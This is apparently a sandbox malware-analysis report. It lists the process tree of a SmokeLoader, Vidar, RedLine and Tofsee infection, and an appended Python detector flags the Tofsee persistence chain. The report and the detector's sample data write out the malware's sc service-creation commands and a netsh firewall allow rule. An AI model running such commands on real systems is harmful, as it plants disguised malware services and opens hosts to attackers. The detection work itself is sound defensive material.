Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:08:57
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:09:09
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\ttfssdi
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ttfssdi
Imagebase: 0x400000
File size: 321536 bytes
MD5 hash: 6F48E0E76C5DFB3FC3AA45311FA6D0EF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

General

Start time: 19:09:11
Start date: 14/01/2022
Path: C:\Users\user\AppData\Roaming\ttfssdi
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ttfssdi
Imagebase: 0x400000
File size: 321536 bytes
MD5 hash: 6F48E0E76C5DFB3FC3AA45311FA6D0EF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.354285300.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.354370443.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security

General

Start time: 19:09:14
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:14
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\5BBC.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:301056 bytes
                                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 46%, Metadefender, Browse
                                                                                                                        • Detection: 77%, ReversingLabs

                                                                                                                        General

                                                                                                                        Start time:19:09:18
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                        File size:51288 bytes
                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:19
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:322048 bytes
                                                                                                                        MD5 hash:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        General

                                                                                                                        Start time:19:09:19
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:21
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6B9B.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:322048 bytes
                                                                                                                        MD5 hash:039CCF44EF7B55AEB4D22D211D17774E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.375596550.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.375811349.0000000001F51000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                        General

                                                                                                                        Start time:19:09:22
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                                                                                                                        Imagebase:0x140000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:23
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\6BA5.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:324608 bytes
                                                                                                                        MD5 hash:7E58C9178CBD9D56DB805F034EC795CB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001C.00000002.368715638.0000000000869000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        General

                                                                                                                        Start time:19:09:23
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                        Imagebase:0x7ff7505d0000
                                                                                                                        File size:36864 bytes
                                                                                                                        MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:26
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\77CC.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:321024 bytes
                                                                                                                        MD5 hash:D8DF1D21042865E2220B0D688BAE6DC4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.396801518.0000000002170000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000002.395583768.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001E.00000003.371626952.0000000002190000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        General

                                                                                                                        Start time:19:09:28
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8058.exe
                                                                                                                        Imagebase:0xd00000
                                                                                                                        File size:537088 bytes
                                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Avira
                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                        General

                                                                                                                        Start time:19:09:31
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                                                                                                                        Imagebase:0x150000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:32
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:32
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                                                                                                                        Imagebase:0x150000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:19:09:33
                                                                                                                        Start date:14/01/2022
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                        File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:33
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase:0x8c0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:34
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:34
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
Imagebase:0x8c0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:36
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:36
Start date:14/01/2022
Path:C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\sc.exe" start ceaplexz
Imagebase:0x8c0000
File size:60928 bytes
MD5 hash:24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:38
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:39
Start date:14/01/2022
Path:C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Imagebase:0x11f0000
File size:82944 bytes
MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:39
Start date:14/01/2022
Path:C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe"
Imagebase:0x400000
File size:14218752 bytes
MD5 hash:BBB91EAF2FB4CC1AA911FF4D555EC36D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000003.399149809.0000000000620000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.401571286.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.402320315.0000000000660000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002B.00000002.402219986.0000000000600000.00000040.00000001.sdmp, Author: Joe Security

General

Start time:19:09:39
Start date:14/01/2022
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

General

Start time:19:09:41
Start date:14/01/2022
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0xed0000
File size:44520 bytes
MD5 hash:FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000002D.00000002.552204136.0000000002EE0000.00000040.00000001.sdmp, Author: Joe Security

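The process records above document the complete Tofsee persistence chain in order: sc create registers a service (ceaplexz) whose binary lives in a freshly created SysWOW64 subfolder and is handed the %TEMP% dropper through a /d"..." argument, sc description and sc start bring it online, netsh adds an inbound allow rule for C:\Windows\SysWOW64\svchost.exe, the service binary runs, and a 32-bit svchost.exe with the bare command line svchost.exe (no -k service group, which services.exe always supplies) then appears carrying the Tofsee Yara match. The detector below is an added example, not part of this Joe Sandbox report or of the analysed sample. It runs over process-creation records constructed from the command lines listed above; the flat image/cmdline record shape, the rule names and the two benign control records are assumptions made for the example. It flags every stage of the chain, correlates the description/start calls with the service name seen at create time, and leaves the control records alone.

```python
import re
from typing import Dict, List, Optional

# Process-creation records constructed for this example. The image paths and command lines are
# copied from the process list in this report; the flat {"image", "cmdline"} shape is a stand-in
# for whatever your telemetry (Sysmon Event ID 1, Security 4688) actually emits.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\SysWOW64\sc.exe",
     "cmdline": r'C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support'},
    {"image": r"C:\Windows\SysWOW64\sc.exe",
     "cmdline": r'C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection'},
    {"image": r"C:\Windows\SysWOW64\sc.exe",
     "cmdline": r'"C:\Windows\System32\sc.exe" start ceaplexz'},
    {"image": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul'},
    {"image": r"C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe",
     "cmdline": r'C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d"C:\Users\user\AppData\Local\Temp\77CC.exe"'},
    {"image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'svchost.exe'},
    # Benign control records (constructed, not from the report); none of them may fire.
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'C:\Windows\System32\svchost.exe -k netsvcs -p'},
    {"image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'"C:\Windows\System32\sc.exe" query wuauserv'},
]

# sc create <svc> binPath= "<bin> /d\"<dropper>\"" ...   (the install command seen in the report)
SC_CREATE_RE = re.compile(
    r'sc\.exe"?\s+create\s+(?P<svc>\S+)\s+binPath=\s*"(?P<bin>[^"\s]+)\s+/d\\?"(?P<dropper>.+?)\\?"',
    re.IGNORECASE)
# sc description|start <svc>   (follow-ups that reference the same service name)
SC_FOLLOWUP_RE = re.compile(r'sc\.exe"?\s+(?P<verb>description|start)\s+(?P<svc>\S+)', re.IGNORECASE)
NETSH_RULE_RE = re.compile(
    r'netsh(?:\.exe)?"?\s+advfirewall\s+firewall\s+add\s+rule\b(?P<args>.*)', re.IGNORECASE)
# <drive>:\Windows\SysWOW64\<subdir>\<name>.exe  (a service binary one level below SysWOW64)
SYSWOW64_SUBDIR_RE = re.compile(r'^[a-z]:\\windows\\syswow64\\[^\\]+\\[^\\]+\.exe$', re.IGNORECASE)
TEMP_DIR_RE = re.compile(r'\\AppData\\Local\\Temp\\', re.IGNORECASE)


def check_service_install(cmdline: str) -> Optional[Dict[str, str]]:
    """Flag sc create whose binary sits in a SysWOW64 subfolder and receives a %TEMP% dropper via /d."""
    m = SC_CREATE_RE.search(cmdline)
    if m and SYSWOW64_SUBDIR_RE.match(m.group("bin")) and TEMP_DIR_RE.search(m.group("dropper")):
        return {"rule": "tofsee_service_install", "service": m.group("svc"),
                "binary": m.group("bin"), "dropper": m.group("dropper")}
    return None


def check_firewall_rule(cmdline: str) -> Optional[Dict[str, str]]:
    """Flag an allow rule whose program is svchost.exe under SysWOW64 or that carries no service=
    scope; Windows' own svchost rules always pair the program with a service=<name> clause."""
    m = NETSH_RULE_RE.search(cmdline)
    if not m:
        return None
    args = m.group("args")
    prog = re.search(r'program="?(?P<p>[^"\s]+)"?', args, re.IGNORECASE)
    if not prog or not prog.group("p").lower().endswith("\\svchost.exe"):
        return None
    action = re.search(r'action=(\S+)', args, re.IGNORECASE)
    if action and action.group(1).lower() != "allow":
        return None
    in_wow64 = "\\syswow64\\" in prog.group("p").lower()
    no_service_scope = re.search(r'\bservice=', args, re.IGNORECASE) is None
    if in_wow64 or no_service_scope:
        return {"rule": "firewall_allow_svchost", "program": prog.group("p")}
    return None


def check_service_binary_launch(image: str, cmdline: str) -> Optional[Dict[str, str]]:
    """Flag the installed service binary running from its SysWOW64 subfolder with a /d"<%TEMP% dropper>"."""
    if SYSWOW64_SUBDIR_RE.match(image) and re.search(r'/d"[^"]*\\AppData\\Local\\Temp\\', cmdline, re.IGNORECASE):
        return {"rule": "tofsee_service_binary_run", "image": image}
    return None


def check_svchost_launch(image: str, cmdline: str) -> Optional[Dict[str, str]]:
    """Flag svchost.exe started without the -k <group> argument that services.exe always passes."""
    if image.lower().endswith("\\svchost.exe") and not re.search(r'(?:^|\s)-k\s+\S+', cmdline, re.IGNORECASE):
        return {"rule": "svchost_without_service_group", "image": image}
    return None


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every check over a stream of records; sc description/start on a service name that an
    earlier sc create already flagged is reported as part of the same chain."""
    findings: List[Dict[str, str]] = []
    flagged_services = set()
    for ev in events:
        image, cmdline = ev["image"], ev["cmdline"]
        for f in (check_service_install(cmdline), check_firewall_rule(cmdline),
                  check_service_binary_launch(image, cmdline), check_svchost_launch(image, cmdline)):
            if f:
                findings.append(f)
                if f["rule"] == "tofsee_service_install":
                    flagged_services.add(f["service"].lower())
        fu = SC_FOLLOWUP_RE.search(cmdline)
        if fu and fu.group("svc").lower() in flagged_services:
            findings.append({"rule": "flagged_service_" + fu.group("verb").lower(), "service": fu.group("svc")})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Each check is deliberately conjunctive: a service binary under SysWOW64 or a netsh rule naming svchost.exe is not alarming on its own, but a SysWOW64 subfolder binary that is told where the %TEMP% dropper is, an allow rule for the 32-bit svchost with no service scope, and an svchost launched without -k are each individually rare on a clean host, and the correlation on the service name ties the sc calls into one chain rather than three isolated hits. The malformed quoting on the sc create and sc description lines (the missing opening quote before C:\ and the unterminated "wifi support) is reproduced as the report records it and is itself a usable string-match indicator.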